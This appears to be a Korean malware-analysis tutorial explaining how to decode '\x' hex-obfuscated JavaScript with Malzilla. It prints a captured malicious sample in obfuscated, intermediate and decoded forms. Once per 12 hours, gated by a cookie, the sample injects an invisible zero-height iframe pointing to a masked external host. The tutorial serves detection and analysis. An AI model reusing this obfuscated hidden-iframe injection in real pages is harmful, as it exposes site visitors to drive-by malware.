개요
두 번째 16진수 난독화 형태는 "\x"를 구분자 기호로 사용하는 유형이다. \x 구분자 기호는 자바스크립트 엔진이 사용하는 16진수 인식 기호다. 이러한 이유로 자바스크립트 함수까지도 난독화가 가능하다.
// Original sample as captured. Every property name and string is a "\x" hex-escaped
// literal that the JS engine decodes at parse time, so window["\x64...\x74"] is just
// window["document"] — the escapes hide keywords from naive string matching only.
// Gate: the block runs only when the marker cookie `nb229=` is NOT already present.
if (window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x6e\x62\x32\x32\x39\x3d') == -1) {
// new window["Date"]()
var aWdHMqss1 = new window["\x44\x61\x74\x65"]();
// setTime(getTime() + 12 h): expiry for the marker cookie, so the payload below
// re-fires at most once per 12 hours in a given browser.
aWdHMqss1["\x73\x65\x74\x54\x69\x6d\x65"](aWdHMqss1["\x67\x65\x74\x54\x69\x6d\x65"]() + 12 * 60 * 60 * 1000);
// document.cookie = 'nb229=Yes;path=/;expires=' + <GMT string of the date above>
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = '\x6e\x62\x32\x32\x39\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d' + aWdHMqss1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]();
// document.write("<iframe src='http://****************/js/cookie.html' width='116' height='0' frameborder='0'></iframe>")
// height='0' keeps the frame invisible to the user. The host is masked with '*' (\x2A) on
// this page. Useful detection anchors: the cookie name nb229, a zero-height iframe injected
// via document.write, and the path /js/cookie.html.
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2f\x6a\x73\x2f\x63\x6f\x6f\x6b\x69\x65\x2e\x68\x74\x6d\x6c\x27 \x77\x69\x64\x74\x68\x3d\x27\x31\x31\x36\x27 \x68\x65\x69\x67\x68\x74\x3d\x27\x30\x27 \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x27\x30\x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");
}
분석
"%" 형태의 16진수 난독화라면 Malzilla에서 바로 풀리지만, "\x" 난독화는 바로 풀리지 않기 때문에 다음과 같이 "\x"를 "%"로 치환하여 난독화 해제를 할 수 있다.
// Intermediate form: every "\x" delimiter of the original replaced with "%" so that a
// URL-decoder (Malzilla, as the text above explains) can expand the %XX pairs. This is
// NOT executable JavaScript — the bracketed names are now literal strings such as
// "%64%6f%63%75%6d%65%6e%74", not "document"; it exists only as a decoding step.
if (window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"]["%69%6e%64%65%78%4f%66"]('%6e%62%32%32%39%3d') == -1) {
var aWdHMqss1 = new window["%44%61%74%65"]();
aWdHMqss1["%73%65%74%54%69%6d%65"](aWdHMqss1["%67%65%74%54%69%6d%65"]() + 12 * 60 * 60 * 1000);
window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"] = '%6e%62%32%32%39%3d%59%65%73%3b%70%61%74%68%3d%2f%3b%65%78%70%69%72%65%73%3d' + aWdHMqss1["%74%6f%47%4d%54%53%74%72%69%6e%67"]();
// %2A decodes to '*': the iframe host is masked on this page, not part of the real sample.
window["%64%6f%63%75%6d%65%6e%74"]["%77%72%69%74%65"]("%3c%69%66%72%61%6d%65 %73%72%63%3d%27%68%74%74%70%3a%2f%2f%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2f%6a%73%2f%63%6f%6f%6b%69%65%2e%68%74%6d%6c%27 %77%69%64%74%68%3d%27%31%31%36%27 %68%65%69%67%68%74%3d%27%30%27 %66%72%61%6d%65%62%6f%72%64%65%72%3d%27%30%27%3e%3c%2f%69%66%72%61%6d%65%3e");
}
// Fully decoded form. Behaviour: if the marker cookie `nb229=` is absent, set it for
// 12 hours and inject a hidden iframe via document.write. The cookie is a frequency
// gate, not a tracking feature — it limits the injection to once per 12 hours per browser.
if (window["document"]["cookie"]["indexOf"]('nb229=') == -1) {
var aWdHMqss1 = new window["Date"]();
// now + 12 * 60 * 60 * 1000 ms = 12 hours
aWdHMqss1["setTime"](aWdHMqss1["getTime"]() + 12 * 60 * 60 * 1000);
window["document"]["cookie"] = 'nb229=Yes;path=/;expires=' + aWdHMqss1["toGMTString"]();
// NOTE: in the original sample the attribute quotes are \x27, i.e. single quotes ('), so
// the real string is "<iframe src='http://...' width='116' height='0' frameborder='0'></iframe>".
// The double quotes on this line are a transcription slip and would terminate the string
// early if run as-is. height='0' makes the frame invisible; the host is masked with '*'.
window["document"]["write"]("<iframe src="http://****************/js/cookie.html" width="116" height="0" frameborder="0">");
}